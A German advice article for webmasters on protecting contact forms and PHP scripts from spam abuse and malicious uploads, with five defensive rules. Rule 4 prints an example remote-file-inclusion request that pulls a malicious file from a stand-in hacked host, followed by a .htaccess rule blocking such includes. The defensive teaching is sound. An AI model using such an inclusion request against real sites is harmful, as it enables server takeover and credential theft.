Nicht erst seit Web2.0 ist die Interaktion mit der Webseite in Mode gekommen, auch viele herkömmliche Seiten bieten über Formularfelder Eingabemöglichkeiten deren Inhalt per E-Mail an eine festgelegte Adresse gesendet werden soll. Das wohl häufigste Beispiel ist das Kontakt-Formular, aber auch Bildergalerien bieten die Möglichkeit Links zu den Bildern an Freunde per Formulareingabe zu versenden, oder bei Artikel-Scripten Bewertungen abzugeben und so weiter. Leider werden diese Möglichkeiten häufig mittels schadhafter Scripte, zum versenden von Mass-Spam missbraucht. Wenn die Formularfelder nicht mit entsprechenden Filtern versehen sind, welche bestimmte Sonderzeichen ausfiltern, dann ist es z.B. möglich zusätzlich zur festgelegten Empfänger Mailadresse, noch bis zu 1024 Zeichen weitere Mailadressen als „Blindcopy“ mit zu versenden. Der Webmaster ärgert sich dann über eine Spam Mail die er über sein Formular bekommen hat, ahnt aber häufig nicht, dass die gleiche Mail über sein Script an einige hundert weitere „Spam-Opfer“ ebenfalls versendet wurde.
Oft unbedachter Nebeneffekt: Der Server auf dem der Account des Webmasters liegt, hat eine eindeutige IP. Die Provider der Spam-Empfänger sperren diese IP wenn darüber zu viel Spam eingeht. Die IP gehört aber nicht dem Webmaster alleine, zumindest wenn er keinen eigenen Server hat. Somit passiert es sehr oft, dass sämtliche Kunden die sich den Server mit dem Webmaster teilen, keine E-Mails mehr an AOL, GMX, Freenet ect versenden können, bis diese die IP wieder aus Ihren Blacklist/Spamlists genommen haben.
Im Internet gibt es sehr viele kostenlose Scripte, Formularscripte, Foren, Content Management Systeme, Gästebücher, Blogs und vieles mehr. Da der Quellcode für jeden offen liegt, ist es für „Bösewichte“ um so leichter Sicherheitslücken zu finden und hierüber unbemerkt schadhafte Dateien in den Account des Webmasters hochzuladen ohne hierfür die Zugangsdaten des Webmasters/Accounts zu kennen.
Mit Hilfe dieser schadhaften Dateien werden dann weitere Spam Mails versendet oder gar Bank/Paypal Daten ergaunert, E-Mail Adressen oder Zugangsdaten von Forenusern ausgelesen und versendet und das alles über den Account des ahnungslosen Webmasters.
Doch wie kann der Webmaster sich schützen ?
1. Regel
Bei der Auswahl der zu installierenden Scripte (Foren, CMS, Bilderalben, ect.) im Vorfeld informieren ob Sicherheitslücken bekannt sind. Im Download Bereich des Anbieters schaun ob das Script noch aktiv weiter entwickelt wird und regelmäßig Updates angeboten werden.
2. Regel
Updaten, Updaten und .. achja : Updaten !
Für fast jede anständige Software, egal ob Forum, CMS oder Shopsystem gibt es vom Anbieter regelmäßig Updates die Sicherheitslücken beseitigen um sich gegen den stetigen Einfallsreichtum der Spam Mafia zu schützen. Es reicht nicht aus sich einmal für eine gute Software zu entscheiden, die Software muss genau wie ein Betriebssystem regelmäßig erneuert und aktualisiert werden um auf dem neusten Stand zu sein und auftretende Sicherheitslücken zu beseitigen.
3. Regel
Vorsicht bei Modulen und Addons !
Für viele Foren, Portalseiten und CMS gibt es im Internet zahlreiche Module die oft kinderleicht einzubinden sind. Sei es um die Lottozahlen oder News einzubinden, die neusten Küchenrezepte anzuzeigen, einen Kalender oder Termine auf der Startseite zu platzieren oder eine Communityverwaltung zu integrieren.
Wichtig: Jedes dieser Module kann zum einen selbst ein schadhaftes Script sein, zum anderen kann es Sicherheitsrisiken durch den Einbau bringen, die der Modbastler übersehen hat.
Außerdem: Je mehr „Extras“ in die Projekte eingebaut werden, um so schwieriger ist es ein Update des eigentlichen Projektes durch zu führen.
4. Regel
Nicht per http includen lassen ! Wenn es möglich ist über die URL Scripte von fremden Seiten in die eigene Webseite einbinden zu lassen, ist es nur eine Frage der Zeit bis die Seite wie ein löcheriger Käse mit schadhaften Scripten befüllt, alle Zugangsdaten bekannt und die IP des Webservers in allen Spamdatenbanken vermerkt ist. Beispiel für einen solchen Aufruf:
„http://Ihre-Domain.xy/ordner/script.php?URL=http://gehackte-seite.xy/boese-datei.txt“
Wenn dieser Aufruf funktioniert, können alle Zugangsdaten die in Config Scripten im Account liegen, aber auch Datenbankinhalte, wie Adressdaten, Foren Accountdaten u.v.m. einfach ausgelesen und verwendet werden.
Mit einer .htaccess lässt sich das Einbilden von externen Adressen verhindern, Inhalt einer solchen .htaccess Datei z.B.:
RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC]
RewriteRule ^(.*) – [F]
5. Regel
Captcha Feld einbauen !
Für Formularfelder z.B. in Kontaktformularen aber auch für Gästebücher oder Kommentar-Einträge sollte man ein Captcha Feld einbauen. Jeder hat es sicher schon einmal gesehen, dieses kleine Bilchen mit einer Zahlen/Buchstaben Kombination welche man vor dem Absenden eines Eintrages korrekt abtippen muss. Dieses Feld soll die Wahrscheinlichkeit verringern das automatisierte Scripte (Bots) unsere Formulare zu müllen.
Eine Anleitung und weitere Informationen zu Captcha Felder finden Sie hier.
100% Sicherheit wird niemals zu erreichen sein. Spam Versender verdienen Millionen, sie verdienen weit mehr Geld als Webhoster oder Anbieter von Anti-Spam Software und somit stehen weit mehr finanzielle Mittel für die Umgehung von Spamfiltern und Spamschutz zur Verfügung, als Webmaster und Spamopfer für den Kampf gegen die Spam Mafia zu zahlen bereit sind.
Jedes Jahr treffen sich schlaue Köpfe zu Anti-Spam Veranstaltungen und versuchen Lösungen zu finden, doch es wird wohl noch eine ganze Weile dauern bis eine wirklich effektive Änderung gefunden ist. Mit oben stehenden Regeln macht der Webmaster es den „bösen Buben“ zumindest schon eine ganze Ecke schwerer.